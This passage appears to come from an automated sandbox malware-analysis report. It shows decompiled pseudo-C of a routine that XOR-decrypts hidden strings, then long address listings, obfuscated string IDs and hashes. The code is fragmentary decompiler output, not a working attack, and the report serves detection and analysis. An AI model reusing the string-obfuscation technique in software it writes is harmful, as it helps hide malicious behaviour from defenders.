															 *((char*)(_t668 - 4)) = 0x15;
															E0082DF41(_t538);
															_t346 =  *0x8b4f2c; // 0x0
															 *((intOrPtr*)(_t668 - 0xe8)) = 0x5d41460c;
															 *((intOrPtr*)(_t668 - 0xe4)) = 0x434f405a;
															 *((intOrPtr*)(_t668 - 0xe0)) = 0xc140c4b;
															 *((char*)(_t668 - 0xdc)) = 0x2e;
															__eflags = _t346 -  *((intOrPtr*)(_t648 + 4));
															if(_t346 >  *((intOrPtr*)(_t648 + 4))) {
																E0086DB91(_t346, 0x8b4f2c);
																__eflags =  *0x8b4f2c - 0xffffffff;
																_pop(_t538);
																if(__eflags == 0) {
																	asm("movsd");
																	asm("movsd");
																	asm("movsd");
																	asm("movsb");
																	L0086DFE8(_t538, __eflags, 0x895d61);
																	L0086DB47(0x8b4f2c);
																	_t648 =  *(_t668 - 0x14);
																	_pop(_t538);
																}
															}
															__eflags =  *0x8b537c;
															if( *0x8b537c == 0) {
																L70:
																_push(_t538);
																_t349 = L0082DFA2(_t668 - 0xb8, 0, E0082D960(_t668 - 0xb8, 0x8b5370) + 0xc);
																_t541 = _t668 - 0xb8;
																E0082DA01(_t541, _t349);
																_push(_t541);
																_push(E0082D960(_t668 - 0xb8, "\","));
																_t478 = E0082D8D6(_t668 - 0xb8, _t648, _t668 - 0x148, 0);
																 *((char*)(_t668 - 4)) = 0x19;
																_t354 =  *0x8b5910; // 0x0
																 *((intOrPtr*)(_t668 - 0x64)) = 0x477d0e52;
																 *((intOrPtr*)(_t668 - 0x60)) = 0xe144b5a;
																 *((char*)(_t668 - 0x5c)) = 0x2e;
																__eflags = _t354 -  *((intOrPtr*)(_t648 + 4));
																if(_t354 >  *((intOrPtr*)(_t648 + 4))) {
																	E0086DB91(_t354, 0x8b5910);
																	__eflags =  *0x8b5910 - 0xffffffff;
																	_pop(_t588);
																	if(__eflags == 0) {
																		asm("movsd");
																		asm("movsd");
																		asm("movsb");
																		L0086DFE8(_t588, __eflags, 0x895d54);
																		 *_t674 = 0x8b5910;
																		L0086DB47();
																		_t648 =  *(_t668 - 0x14);
																	}
																}
																__eflags =  *0x8b53fc;
																if( *0x8b53fc == 0) {
																	L76:
																	_t634 = E0082EA3D(_t668 - 0x30, 0x8b53f4, _t478);
																	 *((char*)(_t668 - 4)) = 0x1a;
																	_t356 = E0082E917(_t668 - 0xd8, _t355, __eflags, "\n");
																	 *((char*)(_t668 - 4)) = 0x1b;
																	E0082D9E5(_t356);
																	E0082DF41(_t668 - 0xd8);
																	E0082DF41(_t668 - 0x30);
																	_t551 = _t668 - 0x148;
																	 *((char*)(_t668 - 4)) = 0x15;
																	E0082DF41(_t551);
																	asm("movaps xmm0, [0x8a8f90]");
																	_t361 =  *0x8b55d4; // 0x0
																	asm("movups [ebp-0x30], xmm0");
																	 *((intOrPtr*)(_t668 - 0x20)) = 0x140c4b43;
																	 *((short*)(_t668 - 0x1c)) = 0x2e0c;
																	__eflags = _t361 -  *((intOrPtr*)(_t648 + 4));
																	if(_t361 >  *((intOrPtr*)(_t648 + 4))) {
																		_t478 = 0x8b55d4;
																		E0086DB91(_t361, 0x8b55d4);
																		__eflags =  *0x8b55d4 - 0xffffffff;
																		_pop(_t551);
																		if( *0x8b55d4 == 0xffffffff) {
																			E0082D1A9(0x8b4ef8, _t668 - 0x30);
																			L0086DFE8(0x8b4ef8, __eflags, 0x895d43);
																			L0086DB47(0x8b55d4);
																			_pop(_t551);
																		}
																	}
																	__eflags =  *0x8b4f0d;
																	if( *0x8b4f0d == 0) {
																		L82:
																		_push(_t551);
																		_t364 = L0082DFA2(_t668 - 0xb8, 0, E0082D960(_t668 - 0xb8, 0x8b4ef8) + 0x15);
																		_t554 = _t668 - 0xb8;
																		E0082DA01(_t554, _t364);
																		_t676 = _t674 - 0x18;
																		_push(_t554);
																		_push(E0082D960(_t668 - 0xb8, "\","));
																		E0082D8D6(_t668 - 0xb8, _t648, _t676, 0);
																		_t368 = L00822F89(_t478, _t668 - 0x30, _t634);
																		_t677 = _t676 + 0x18;
																		_t479 = _t368;
																		 *((char*)(_t668 - 4)) = 0x1c;
																		_t369 =  *0x8b5354; // 0x0
																		 *((intOrPtr*)(_t668 - 0x7c)) = 0x41620e52;
																		 *((intOrPtr*)(_t668 - 0x78)) = 0x14404749;
																		 *((short*)(_t668 - 0x74)) = 0x2e0e;
																		__eflags = _t369 -  *((intOrPtr*)(_t648 + 4));
																		if(_t369 >  *((intOrPtr*)(_t648 + 4))) {
																			E0086DB91(_t369, 0x8b5354);
																			__eflags =  *0x8b5354 - 0xffffffff;
																			_pop(_t584);
																			if(__eflags == 0) {
																				asm("movsd");
																				asm("movsd");
																				asm("movsw");
																				L0086DFE8(_t584, __eflags, 0x895d35);
																				 *_t677 = 0x8b5354;
																				L0086DB47();
																				_t648 =  *(_t668 - 0x14);
																			}
																		}
																		__eflags =  *0x8b4e91;
																		if( *0x8b4e91 == 0) {
																			L88:
																			_t636 = E0082EA3D(_t668 - 0xd8, 0x8b4e88, _t479);
																			 *((char*)(_t668 - 4)) = 0x1d;
																			_t371 = E0082E917(_t668 - 0x148, _t370, __eflags, "\n");
																			 *((char*)(_t668 - 4)) = 0x1e;
																			E0082D9E5(_t371);
																			E0082DF41(_t668 - 0x148);
																			E0082DF41(_t668 - 0xd8);
																			_t565 = _t668 - 0x30;
																			 *((char*)(_t668 - 4)) = 0x15;
																			E0082DF41(_t565);
																			asm("movaps xmm0, [0x8a8dc0]");
																			_t376 =  *0x8b5498; // 0x0
																			asm("movups [ebp-0x30], xmm0");
																			 *((intOrPtr*)(_t668 - 0x20)) = 0x140c4a5c;
																			 *((short*)(_t668 - 0x1c)) = 0x2e0c;
																			__eflags = _t376 -  *((intOrPtr*)(_t648 + 4));
																			if(_t376 >  *((intOrPtr*)(_t648 + 4))) {
																				_t479 = 0x8b5498;
																				E0086DB91(_t376, 0x8b5498);
																				__eflags =  *0x8b5498 - 0xffffffff;
																				_pop(_t565);
																				if( *0x8b5498 == 0xffffffff) {
																					E0082D1A9(0x8b552c, _t668 - 0x30);
																					L0086DFE8(0x8b552c, __eflags, 0x895d24);
																					L0086DB47(0x8b5498);
																					_pop(_t565);
																				}
																			}
																			__eflags =  *0x8b5541;
																			if( *0x8b5541 == 0) {
																				L94:
																				_push(_t565);
																				_t379 = L0082DFA2(_t668 - 0xb8, 0, E0082D960(_t668 - 0xb8, 0x8b552c) + 0x15);
																				_t568 = _t668 - 0xb8;
																				E0082DA01(_t568, _t379);
																				_t678 = _t677 - 0x18;
																				_t658 = _t678;
																				_push(_t568);
																				_push(E0082D960(_t668 - 0xb8, "\","));
																				E0082D8D6(_t668 - 0xb8, _t648, _t678, 0);
																				_t383 = L00822F89(_t479, _t668 - 0x50, _t636);
																				_t674 = _t678 + 0x18;
																				_t474 = _t383;
																				 *((char*)(_t668 - 4)) = 0x1f;
																				_t384 =  *0x8b4bc4; // 0x0
																				 *(_t668 - 0x70) = 0x4f7e0e52;
																				 *((intOrPtr*)(_t668 - 0x6c)) = 0xe145d5d;
																				 *((char*)(_t668 - 0x68)) = 0x2e;
																				__eflags = _t384 -  *((intOrPtr*)(_t648 + 4));
																				if(_t384 >  *((intOrPtr*)(_t648 + 4))) {
																					E0086DB91(_t384, 0x8b4bc4);
																					__eflags =  *0x8b4bc4 - 0xffffffff;
																					_pop(_t580);
																					if(__eflags == 0) {
																						_t658 = _t668 - 0x70;
																						asm("movsd");
																						asm("movsd");
																						asm("movsb");
																						L0086DFE8(_t580, __eflags, 0x895d17);
																						 *_t674 = 0x8b4bc4;
																						L0086DB47();
																						_t648 =  *(_t668 - 0x14);
																					}
																				}
																				__eflags =  *0x8b5e1c;
																				if( *0x8b5e1c == 0) {
																					L100:
																					_t385 = E0082EA3D(_t668 - 0xd8, 0x8b5e14, _t474);
																					 *((char*)(_t668 - 4)) = 0x20;
																					_t386 = E0082E917(_t668 - 0x148, _t385, __eflags, "\n\n");
																					 *((char*)(_t668 - 4)) = 0x21;
																					E0082D9E5(_t386);
																					E0082DF41(_t668 - 0x148);
																					E0082DF41(_t668 - 0xd8);
																					_t530 = _t668 - 0x50;
																					 *((char*)(_t668 - 4)) = 0x15;
																					E0082DF41(_t530);
																					 *0x8b4848 =  *0x8b4848 + 1;
																					_t338 =  *0x8b55b0; // 0x0
																					 *(_t668 - 0x98) = 0x5d41460c;
																					 *((intOrPtr*)(_t668 - 0x94)) = 0x434f405a;
																					 *((intOrPtr*)(_t668 - 0x90)) = 0xc140c4b;
																					 *((char*)(_t668 - 0x8c)) = 0x2e;
																					__eflags = _t338 -  *((intOrPtr*)(_t648 + 4));
																					if(_t338 >  *((intOrPtr*)(_t648 + 4))) {
																						_t474 = 0x8b55b0;
																						E0086DB91(_t338, 0x8b55b0);
																						__eflags =  *0x8b55b0 - 0xffffffff;
																						_pop(_t530);
																						if(__eflags == 0) {
																							_t658 = _t668 - 0x98;
																							asm("movsd");
																							asm("movsd");
																							asm("movsd");
																							asm("movsb");
																							L0086DFE8(_t530, __eflags, 0x895d81);
																							L0086DB47(0x8b55b0);
																							_t648 =  *(_t668 - 0x14);
																							_pop(_t530);
																						}
																					}
																					__eflags =  *0x8b5648;
																					if( *0x8b5648 == 0) {
																						goto L57;
																					}
																				} else {
																					_t391 = 0;
																					__eflags = 0;
																					do {
																						 *(_t391 + 0x8b5e14) =  *(_t391 + 0x8b5e14) ^ 0x0000002e;
																						_t391 = _t391 + 1;
																						__eflags = _t391 - 9;
																					} while (_t391 < 9);
																					goto L100;
																				}
																			} else {
																				_t395 = 0;
																				__eflags = 0;
																				do {
																					 *(_t395 + 0x8b552c) =  *(_t395 + 0x8b552c) ^ 0x0000002e;
																					_t395 = _t395 + 1;
																					__eflags = _t395 - 0x16;
																				} while (_t395 < 0x16);
																				goto L94;
																			}
																		} else {
																			_t401 = 0;
																			__eflags = 0;
																			do {
																				 *(_t401 + 0x8b4e88) =  *(_t401 + 0x8b4e88) ^ 0x0000002e;
																				_t401 = _t401 + 1;
																				__eflags = _t401 - 0xa;
																			} while (_t401 < 0xa);
																			goto L88;
																		}
																	} else {
																		_t405 = 0;
																		__eflags = 0;
																		do {
																			 *(_t405 + 0x8b4ef8) =  *(_t405 + 0x8b4ef8) ^ 0x0000002e;
																			_t405 = _t405 + 1;
																			__eflags = _t405 - 0x16;
																		} while (_t405 < 0x16);
																		goto L82;
																	}
																} else {
																	_t411 = 0;
																	__eflags = 0;
																	do {
																		 *(_t411 + 0x8b53f4) =  *(_t411 + 0x8b53f4) ^ 0x0000002e;
																		_t411 = _t411 + 1;
																		__eflags = _t411 - 9;
																	} while (_t411 < 9);
																	goto L76;
																}
															} else {
																_t415 = 0;
																__eflags = 0;
																do {
																	 *(_t415 + 0x8b5370) =  *(_t415 + 0x8b5370) ^ 0x0000002e;
																	_t415 = _t415 + 1;
																	__eflags = _t415 - 0xd;
																} while (_t415 < 0xd);
																goto L70;
															}
														} else {
															_t419 = 0;
															__eflags = 0;
															do {
																 *(_t419 + 0x8b5c04) =  *(_t419 + 0x8b5c04) ^ 0x0000002e;
																_t419 = _t419 + 1;
																__eflags = _t419 - 0x1f;
															} while (_t419 < 0x1f);
															goto L64;
														}
													}
												} else {
													_t430 = 0;
													__eflags = 0;
													do {
														 *(_t430 + 0x8b6108) =  *(_t430 + 0x8b6108) ^ 0x0000002e;
														_t430 = _t430 + 1;
														__eflags = _t430 - 0xc;
													} while (_t430 < 0xc);
													goto L47;
												}
											}
											__eflags = _t658;
											if(_t658 != 0) {
												E008116CB(_t658);
											}
											 *((char*)(_t668 - 4)) = 0xd;
											_t517 =  *(_t668 - 0xbc);
											__eflags =  *(_t668 - 0xbc);
											if(__eflags != 0) {
												E008116CB(_t517);
											}
											goto L106;
										}
										__eflags = _t658;
										if(_t658 != 0) {
											E008116CB(_t658);
										}
										_t500 =  *(_t668 - 0x10c);
										__eflags =  *(_t668 - 0x10c);
										if( *(_t668 - 0x10c) != 0) {
											E008116CB(_t500);
										}
										E0082DF41(_t668 - 0xb8);
										goto L112;
									} else {
										_t436 = 0;
										do {
											 *(_t436 + 0x8b5b24) =  *(_t436 + 0x8b5b24) ^ 0x0000002e;
											_t436 = _t436 + 1;
											__eflags = _t436 - 0x1a;
										} while (_t436 < 0x1a);
										goto L28;
									}
								} else {
									_t490 = _t668 - 0x30;
									L18:
									_t289 = E0082DF41(_t490);
									 *[fs:0x0] =  *((intOrPtr*)(_t668 - 0xc));
									return _t289;
								}
							} else {
								_t460 = 0;
								do {
									 *(_t460 + 0x8b5ca4) =  *(_t460 + 0x8b5ca4) ^ 0x0000002e;
									_t460 = _t460 + 1;
									_t693 = _t460 - 0x22;
								} while (_t460 < 0x22);
								goto L14;
							}
						}
					} else {
						_t466 = 0;
						do {
							 *(_t466 + 0x8b50c8) =  *(_t466 + 0x8b50c8) ^ 0x0000002e;
							_t466 = _t466 + 1;
						} while (_t466 < 0x21);
						goto L7;
					}
				}
			}


























































































                                    0x0082309a
                                    0x0082309f
                                    0x008230a5
                                    0x008230a7
                                    0x008230aa
                                    0x008230ad
                                    0x008230b2
                                    0x008230ba
                                    0x008230c6
                                    0x008232ec
                                    0x00000000
                                    0x008230cc
                                    0x008230cc
                                    0x008230d1
                                    0x008230e3
                                    0x008230e8
                                    0x008230ec
                                    0x008230f3
                                    0x008230fa
                                    0x008230ff
                                    0x00823103
                                    0x00823105
                                    0x0082310c
                                    0x00823110
                                    0x0082311a
                                    0x00823121
                                    0x00823126
                                    0x0082312e
                                    0x00823139
                                    0x00823143
                                    0x00823148
                                    0x0082314f
                                    0x00823154
                                    0x0082312e
                                    0x0082315c
                                    0x0082316d
                                    0x0082316d
                                    0x00823177
                                    0x00823181
                                    0x00823187
                                    0x0082318c
                                    0x00823194
                                    0x008231a2
                                    0x008232da
                                    0x00000000
                                    0x008231a8
                                    0x008231a8
                                    0x008231ab
                                    0x008231ad
                                    0x008231b5
                                    0x008231b8
                                    0x008231bf
                                    0x008231c1
                                    0x008231c6
                                    0x008231ca
                                    0x008231d1
                                    0x008231d6
                                    0x008231da
                                    0x008231e0
                                    0x008231e7
                                    0x008231f1
                                    0x008231f9
                                    0x008231fe
                                    0x00823206
                                    0x00823211
                                    0x0082321b
                                    0x00823221
                                    0x00823227
                                    0x00823206
                                    0x0082322f
                                    0x00823240
                                    0x00823248
                                    0x0082324f
                                    0x00823255
                                    0x00823258
                                    0x00823265
                                    0x00823270
                                    0x0082327a
                                    0x0082327f
                                    0x00823284
                                    0x00823289
                                    0x0082328b
                                    0x00823290
                                    0x00823294
                                    0x00823294
                                    0x0082329f
                                    0x008232aa
                                    0x008232ae
                                    0x008232c1
                                    0x008232df
                                    0x008232e2
                                    0x008232e5
                                    0x008232f3
                                    0x008232f3
                                    0x008232f5
                                    0x008232fc
                                    0x00823301
                                    0x00823305
                                    0x0082330c
                                    0x00823313
                                    0x00823319
                                    0x0082331f
                                    0x00823321
                                    0x00823327
                                    0x0082332c
                                    0x00823334
                                    0x0082333f
                                    0x00823349
                                    0x0082334f
                                    0x00823355
                                    0x00823334
                                    0x00823356
                                    0x0082335d
                                    0x0082336e
                                    0x0082336e
                                    0x0082337e
                                    0x00823384
                                    0x00823387
                                    0x0082338d
                                    0x00823393
                                    0x00823397
                                    0x008233a0
                                    0x008233a4
                                    0x008233ac
                                    0x008233b0
                                    0x008233b2
                                    0x008233b7
                                    0x008233b9
                                    0x00823dea
                                    0x00823dea
                                    0x00000000
                                    0x00823dea
                                    0x008233bf
                                    0x008233c2
                                    0x008233c5
                                    0x008233c9
                                    0x008233cd
                                    0x008233d2
                                    0x008233d7
                                    0x008233da
                                    0x008233dc
                                    0x00000000
                                    0x00000000
                                    0x008233e2
                                    0x008233e9
                                    0x008233f3
                                    0x008233fa
                                    0x00823404
                                    0x0082340a
                                    0x0082340e
                                    0x00823413
                                    0x00823418
                                    0x00823423
                                    0x0082342b
                                    0x0082343d
                                    0x00823442
                                    0x00823448
                                    0x0082344e
                                    0x00823454
                                    0x00823467
                                    0x0082346c
                                    0x00823472
                                    0x00823475
                                    0x0082347d
                                    0x00823484
                                    0x0082348b
                                    0x0082348d
                                    0x0082348f
                                    0x0082348f
                                    0x00823494
                                    0x00823498
                                    0x00823498
                                    0x0082349a
                                    0x00000000
                                    0x00000000
                                    0x008234a0
                                    0x008234a7
                                    0x008234a9
                                    0x00823da9
                                    0x00823daf
                                    0x00823db4
                                    0x00823dba
                                    0x00000000
                                    0x00823dba
                                    0x008234af
                                    0x008234bd
                                    0x008234c5
                                    0x008234c8
                                    0x008234cb
                                    0x008234d2
                                    0x008234d6
                                    0x008234db
                                    0x008234de
                                    0x008234e1
                                    0x008234e5
                                    0x008234e7
                                    0x008234ec
                                    0x008234ee
                                    0x00000000
                                    0x00000000
                                    0x008234f4
                                    0x008234ff
                                    0x0082350a
                                    0x0082350d
                                    0x0082351a
                                    0x00823523
                                    0x00823527
                                    0x0082352c
                                    0x00823531
                                    0x0082353c
                                    0x00823544
                                    0x0082354f
                                    0x00823561
                                    0x00823566
                                    0x0082356c
                                    0x00823572
                                    0x00823579
                                    0x00823580
                                    0x00823586
                                    0x00823599
                                    0x0082359e
                                    0x008235a4
                                    0x008235a7
                                    0x008235af
                                    0x008235b6
                                    0x008235bd
                                    0x008235bf
                                    0x008235c1
                                    0x008235c1
                                    0x008235c6
                                    0x008235ca
                                    0x008235ca
                                    0x008235cc
                                    0x00000000
                                    0x00000000
                                    0x008235d9
                                    0x008235db
                                    0x00823d6f
                                    0x00823d75
                                    0x00823d7a
                                    0x00823d80
                                    0x00000000
                                    0x00823d80
                                    0x008235e7
                                    0x008235f1
                                    0x008235fb
                                    0x00823602
                                    0x00823604
                                    0x00823609
                                    0x0082360c
                                    0x00823612
                                    0x00823619
                                    0x0082361e
                                    0x00823625
                                    0x00823626
                                    0x00823638
                                    0x00823639
                                    0x0082363a
                                    0x0082363b
                                    0x00823640
                                    0x00823647
                                    0x0082364c
                                    0x0082364f
                                    0x00823626
                                    0x00823650
                                    0x00823657
                                    0x00823668
                                    0x0082366b
                                    0x0082366f
                                    0x00823671
                                    0x00823676
                                    0x0082367d
                                    0x00823684
                                    0x00823689
                                    0x0082369b
                                    0x008236a6
                                    0x008236a8
                                    0x008236ad
                                    0x008236b0
                                    0x008236b4
                                    0x008236b9
                                    0x008236bb
                                    0x00000000
                                    0x00000000
                                    0x008236c1
                                    0x008236c6
                                    0x008236cc
                                    0x008236d0
                                    0x008236d5
                                    0x008236e2
                                    0x008236e7
                                    0x008236ed
                                    0x008236f0
                                    0x008236f2
                                    0x008236f4
                                    0x008236f8
                                    0x008236fc
                                    0x008236fc
                                    0x00823701
                                    0x00823707
                                    0x0082370c
                                    0x0082370c
                                    0x00823711
                                    0x0082371b
                                    0x00823725
                                    0x0082372f
                                    0x00823736
                                    0x0082373c
                                    0x0082373e
                                    0x00823744
                                    0x00823749
                                    0x00823750
                                    0x00823751
                                    0x00823758
                                    0x00823763
                                    0x00823764
                                    0x00823765
                                    0x00823766
                                    0x00823767
                                    0x0082376d
                                    0x00823772
                                    0x00823776
                                    0x00823776
                                    0x00823751
                                    0x00823777
                                    0x0082377e
                                    0x00000000
                                    0x00000000
                                    0x00823780
                                    0x00823780
                                    0x00823780
                                    0x00823782
                                    0x00823782
                                    0x00823789
                                    0x0082378a
                                    0x0082378a
                                    0x0082378f
                                    0x0082378f
                                    0x008237a0
                                    0x008237a3
                                    0x00000000
                                    0x00000000
                                    0x008237a9
                                    0x008237b0
                                    0x008237b5
                                    0x008237b9
                                    0x008237c0
                                    0x008237c7
                                    0x008237ce
                                    0x008237d4
                                    0x008237d8
                                    0x008237de
                                    0x008237e0
                                    0x008237e6
                                    0x008237eb
                                    0x008237f3
                                    0x008237fe
                                    0x00823808
                                    0x0082380e
                                    0x00823814
                                    0x008237f3
                                    0x00823815
                                    0x0082381c
                                    0x0082382d
                                    0x0082382d
                                    0x0082383a
                                    0x00823847
                                    0x00823851
                                    0x0082385d
                                    0x00823861
                                    0x0082386c
                                    0x00823871
                                    0x00823874
                                    0x00823878
                                    0x0082387d
                                    0x00823882
                                    0x0082388c
                                    0x00823896
                                    0x008238a0
                                    0x008238a7
                                    0x008238ad
                                    0x008238b5
                                    0x008238ba
                                    0x008238c1
                                    0x008238c2
                                    0x008238d4
                                    0x008238d5
                                    0x008238d6
                                    0x008238d7
                                    0x008238d8
                                    0x008238de
                                    0x008238e3
                                    0x008238e7
                                    0x008238e7
                                    0x008238c2
                                    0x008238e8
                                    0x008238ef
                                    0x00823900
                                    0x00823900
                                    0x0082391d
                                    0x00823923
                                    0x00823929
                                    0x0082392e
                                    0x0082393f
                                    0x00823954
                                    0x00823956
                                    0x0082395a
                                    0x0082395f
                                    0x00823966
                                    0x0082396d
                                    0x00823971
                                    0x00823977
                                    0x0082397e
                                    0x00823983
                                    0x0082398a
                                    0x0082398b
                                    0x0082399a
                                    0x0082399b
                                    0x0082399c
                                    0x0082399d
                                    0x008239a2
                                    0x008239a9
                                    0x008239ae
                                    0x008239b1
                                    0x0082398b
                                    0x008239b2
                                    0x008239b9
                                    0x008239ca
                                    0x008239de
                                    0x008239e0
                                    0x008239ea
                                    0x008239f6
                                    0x008239fa
                                    0x00823a05
                                    0x00823a0d
                                    0x00823a12
                                    0x00823a18
                                    0x00823a1c
                                    0x00823a21
                                    0x00823a28
                                    0x00823a2d
                                    0x00823a31
                                    0x00823a38
                                    0x00823a3e
                                    0x00823a44
                                    0x00823a46
                                    0x00823a4c
                                    0x00823a51
                                    0x00823a58
                                    0x00823a59
                                    0x00823a64
                                    0x00823a6e
                                    0x00823a74
                                    0x00823a7a
                                    0x00823a7a
                                    0x00823a59
                                    0x00823a7b
                                    0x00823a82
                                    0x00823a93
                                    0x00823a93
                                    0x00823ab0
                                    0x00823ab6
                                    0x00823abc
                                    0x00823ac1
                                    0x00823ac6
                                    0x00823ad7
                                    0x00823ae1
                                    0x00823ae9
                                    0x00823aee
                                    0x00823af1
                                    0x00823af3
                                    0x00823af7
                                    0x00823afc
                                    0x00823b03
                                    0x00823b0a
                                    0x00823b10
                                    0x00823b16
                                    0x00823b1d
                                    0x00823b22
                                    0x00823b29
                                    0x00823b2a
                                    0x00823b39
                                    0x00823b3a
                                    0x00823b3b
                                    0x00823b3d
                                    0x00823b42
                                    0x00823b49
                                    0x00823b4e
                                    0x00823b51
                                    0x00823b2a
                                    0x00823b52
                                    0x00823b59
                                    0x00823b6a
                                    0x00823b81
                                    0x00823b83
                                    0x00823b8d
                                    0x00823b99
                                    0x00823b9d
                                    0x00823ba8
                                    0x00823bb3
                                    0x00823bb8
                                    0x00823bbb
                                    0x00823bbf
                                    0x00823bc4
                                    0x00823bcb
                                    0x00823bd0
                                    0x00823bd4
                                    0x00823bdb
                                    0x00823be1
                                    0x00823be7
                                    0x00823be9
                                    0x00823bef
                                    0x00823bf4
                                    0x00823bfb
                                    0x00823bfc
                                    0x00823c07
                                    0x00823c11
                                    0x00823c17
                                    0x00823c1d
                                    0x00823c1d
                                    0x00823bfc
                                    0x00823c1e
                                    0x00823c25
                                    0x00823c36
                                    0x00823c36
                                    0x00823c53
                                    0x00823c59
                                    0x00823c5f
                                    0x00823c64
                                    0x00823c67
                                    0x00823c69
                                    0x00823c7a
                                    0x00823c84
                                    0x00823c8c
                                    0x00823c91
                                    0x00823c94
                                    0x00823c96
                                    0x00823c9a
                                    0x00823c9f
                                    0x00823ca6
                                    0x00823cad
                                    0x00823cb1
                                    0x00823cb7
                                    0x00823cbe
                                    0x00823cc3
                                    0x00823cca
                                    0x00823ccb
                                    0x00823cd2
                                    0x00823cda
                                    0x00823cdb
                                    0x00823cdc
                                    0x00823cdd
                                    0x00823ce2
                                    0x00823ce9
                                    0x00823cee
                                    0x00823cf1
                                    0x00823ccb
                                    0x00823cf2
                                    0x00823cf9
                                    0x00823d0a
                                    0x00823d16
                                    0x00823d23
                                    0x00823d2d
                                    0x00823d39
                                    0x00823d3d
                                    0x00823d48
                                    0x00823d53
                                    0x00823d58
                                    0x00823d5b
                                    0x00823d5f
                                    0x00823d64
                                    0x0082370c
                                    0x00823711
                                    0x0082371b
                                    0x00823725
                                    0x0082372f
                                    0x00823736
                                    0x0082373c
                                    0x0082373e
                                    0x00823744
                                    0x00823749
                                    0x00823750
                                    0x00823751
                                    0x00823758
                                    0x00823763
                                    0x00823764
                                    0x00823765
                                    0x00823766
                                    0x00823767
                                    0x0082376d
                                    0x00823772
                                    0x00823776
                                    0x00823776
                                    0x00823751
                                    0x00823777
                                    0x0082377e
                                    0x00000000
                                    0x00000000
                                    0x00823cfb
                                    0x00823cfb
                                    0x00823cfb
                                    0x00823cfd
                                    0x00823cfd
                                    0x00823d04
                                    0x00823d05
                                    0x00823d05
                                    0x00000000
                                    0x00823cfd
                                    0x00823c27
                                    0x00823c27
                                    0x00823c27
                                    0x00823c29
                                    0x00823c29
                                    0x00823c30
                                    0x00823c31
                                    0x00823c31
                                    0x00000000
                                    0x00823c29
                                    0x00823b5b
                                    0x00823b5b
                                    0x00823b5b
                                    0x00823b5d
                                    0x00823b5d
                                    0x00823b64
                                    0x00823b65
                                    0x00823b65
                                    0x00000000
                                    0x00823b5d
                                    0x00823a84
                                    0x00823a84
                                    0x00823a84
                                    0x00823a86
                                    0x00823a86
                                    0x00823a8d
                                    0x00823a8e
                                    0x00823a8e
                                    0x00000000
                                    0x00823a86
                                    0x008239bb
                                    0x008239bb
                                    0x008239bb
                                    0x008239bd
                                    0x008239bd
                                    0x008239c4
                                    0x008239c5
                                    0x008239c5
                                    0x00000000
                                    0x008239bd
                                    0x008238f1
                                    0x008238f1
                                    0x008238f1
                                    0x008238f3
                                    0x008238f3
                                    0x008238fa
                                    0x008238fb
                                    0x008238fb
                                    0x00000000
                                    0x008238f3
                                    0x0082381e
                                    0x0082381e
                                    0x0082381e
                                    0x00823820
                                    0x00823820
                                    0x00823827
                                    0x00823828
                                    0x00823828
                                    0x00000000
                                    0x00823820
                                    0x0082381c
                                    0x00823659
                                    0x00823659
                                    0x00823659
                                    0x0082365b
                                    0x0082365b
                                    0x00823662
                                    0x00823663
                                    0x00823663
                                    0x00000000
                                    0x0082365b
                                    0x00823657
                                    0x00823d8b
                                    0x00823d8d
                                    0x00823d91
                                    0x00823d91
                                    0x00823d96
                                    0x00823d9a
                                    0x00823da0
                                    0x00823da2
                                    0x00823da4
                                    0x00823da4
                                    0x00000000
                                    0x00823da2
                                    0x00823dc5
                                    0x00823dc7
                                    0x00823dcb
                                    0x00823dcb
                                    0x00823dd0
                                    0x00823dd6
                                    0x00823dd8
                                    0x00823dda
                                    0x00823dda
                                    0x00823de5
                                    0x00000000
                                    0x0082335f
                                    0x0082335f
                                    0x00823361
                                    0x00823361
                                    0x00823368
                                    0x00823369
                                    0x00823369
                                    0x00000000
                                    0x00823361
                                    0x008232c3
                                    0x008232c3
                                    0x008232c6
                                    0x008232c6
                                    0x008232d0
                                    0x008232d9
                                    0x008232d9
                                    0x00823231
                                    0x00823231
                                    0x00823233
                                    0x00823233
                                    0x0082323a
                                    0x0082323b
                                    0x0082323b
                                    0x00000000
                                    0x00823233
                                    0x0082322f
                                    0x0082315e
                                    0x0082315e
                                    0x00823160
                                    0x00823160
                                    0x00823167
                                    0x00823168
                                    0x00000000
                                    0x00823160
                                    0x0082315c

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$ConditionDeallocateVariableWake
                                    • String ID: !$.$.$.$.$.$BAIG@]$HGBK$Install Directory$Z@OC$Z@OC$[]K\$\Main$]|$].$]A@.$hAVs
                                    • API String ID: 1208101283-1360112660
                                    • Opcode ID: 2ad52bd0ec0b58e0cb440dc5561440b9570b0b9441a3d4dd87130a35d1b46e9a
                                    • Instruction ID: 4cb9aae4e2feef586c64bffda5267ee8432abd92fa52af227a797b14b3e866b6
                                    • Opcode Fuzzy Hash: 2ad52bd0ec0b58e0cb440dc5561440b9570b0b9441a3d4dd87130a35d1b46e9a
                                    • Instruction Fuzzy Hash: B972FF309007A89ADB15EBA8EC56BEDBB74FF11310F140198E515EB292DF745AC8CB52
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 008561B5 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 266COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
